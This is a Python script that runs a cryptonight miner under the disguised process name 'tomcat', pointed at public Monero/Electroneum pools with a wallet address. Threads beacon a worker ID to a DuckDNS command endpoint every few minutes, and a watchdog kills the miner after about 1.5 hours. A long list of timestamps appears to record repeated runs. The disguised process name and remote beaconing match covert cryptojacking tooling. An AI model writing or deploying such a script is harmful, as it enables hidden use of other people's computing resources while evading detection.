import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:02.198756
#2018-02-17 15:55:05.418345
#2018-02-17 17:43:05.683259
#2018-02-17 19:29:03.753737
#2018-02-17 21:18:03.380504
#2018-02-17 23:02:06.529709
#2018-02-18 00:49:07.115851
#2018-02-18 02:36:01.278580
#2018-02-18 04:22:06.078557
#2018-02-18 06:14:05.104133
#2018-02-18 08:04:05.800197
#2018-02-18 09:52:04.871026
#2018-02-18 11:39:01.919515
#2018-02-18 13:24:07.932926
#2018-02-18 15:14:07.757495
#2018-02-18 17:03:04.959236
#2018-02-18 18:49:05.292495
#2018-02-18 20:35:07.386266
#2018-02-18 22:20:07.900042
#2018-02-19 00:09:04.379145
#2018-02-19 01:55:04.353242
#2018-02-19 03:42:04.275982
#2018-02-19 05:27:06.603474
#2018-02-19 07:15:06.296081
#2018-02-19 09:05:07.671224
#2018-02-19 10:53:04.755922
#2018-02-19 12:41:09.424181
#2018-02-19 14:28:06.486423
#2018-02-19 16:16:08.477996
#2018-02-19 18:04:09.286818
#2018-02-19 19:50:03.983884
#2018-02-19 21:37:06.860645
#2018-02-19 23:24:07.156171
#2018-02-20 01:10:06.369276
#2018-02-20 02:59:06.006653
#2018-02-20 04:47:06.032422
#2018-02-20 06:31:05.624783
#2018-02-20 08:17:07.378132
#2018-02-20 10:03:01.508908
#2018-02-20 11:47:06.268451
#2018-02-20 13:35:08.555773
#2018-02-20 15:19:01.439958
#2018-02-20 17:04:10.486918
#2018-02-20 18:51:09.156126
#2018-02-20 20:42:05.987134
#2018-02-20 22:26:01.802052
#2018-02-21 00:08:02.003532
#2018-02-21 01:53:05.656725
#2018-02-21 03:42:01.421768
#2018-02-21 05:30:08.504270
#2018-02-21 07:19:04.405931
#2018-02-21 09:04:08.120092
#2018-02-21 10:51:07.311912
#2018-02-21 12:38:06.378684
#2018-02-21 14:27:06.540836
#2018-02-21 16:14:06.532846
#2018-02-21 18:05:05.403222
#2018-02-21 19:51:04.627726
#2018-02-21 21:39:05.877270
#2018-02-21 23:25:07.847077
#2018-02-22 01:13:01.372969
#2018-02-22 03:01:08.433166
#2018-02-22 04:48:05.415061
#2018-02-22 06:33:07.227621
#2018-02-22 08:22:05.860690
#2018-02-22 10:09:07.210673
#2018-02-22 11:55:10.844299
#2018-02-22 13:39:07.497751
#2018-02-22 15:28:09.619846
#2018-02-22 17:15:03.865205
#2018-02-22 19:02:02.212822
#2018-02-22 20:52:07.360180
#2018-02-22 22:37:05.199453
#2018-02-23 00:26:06.682242
#2018-02-23 02:13:04.649585
#2018-02-23 03:56:05.956188
#2018-02-23 05:43:06.640600
#2018-02-23 07:28:06.489857
#2018-02-23 09:32:05.268577
#2018-02-23 11:38:06.640487
#2018-02-23 13:27:06.110506
#2018-02-23 15:13:06.073944
#2018-02-23 17:03:08.448984
#2018-02-23 18:50:04.220123
#2018-02-23 20:35:08.691225
#2018-02-23 22:22:01.687353
#2018-02-24 00:08:01.540560
#2018-02-24 01:58:05.464467
#2018-02-24 03:50:09.477516
#2018-02-24 05:38:06.532092
#2018-02-24 07:26:07.453055
#2018-02-24 09:15:08.588977
#2018-02-24 11:10:08.691772
#2018-02-24 12:58:03.309507
#2018-02-24 14:46:06.650293
#2018-02-24 16:38:06.144079
#2018-02-24 18:27:05.237633
#2018-02-24 20:13:05.385155
#2018-02-24 21:59:06.951680
#2018-02-25 00:59:03.468463
#2018-02-25 03:55:05.540910
#2018-02-25 06:39:06.461980
#2018-02-25 11:36:05.030088
#2018-02-25 13:25:01.997616
#2018-02-25 14:58:01.988779
#2018-02-25 16:31:01.447118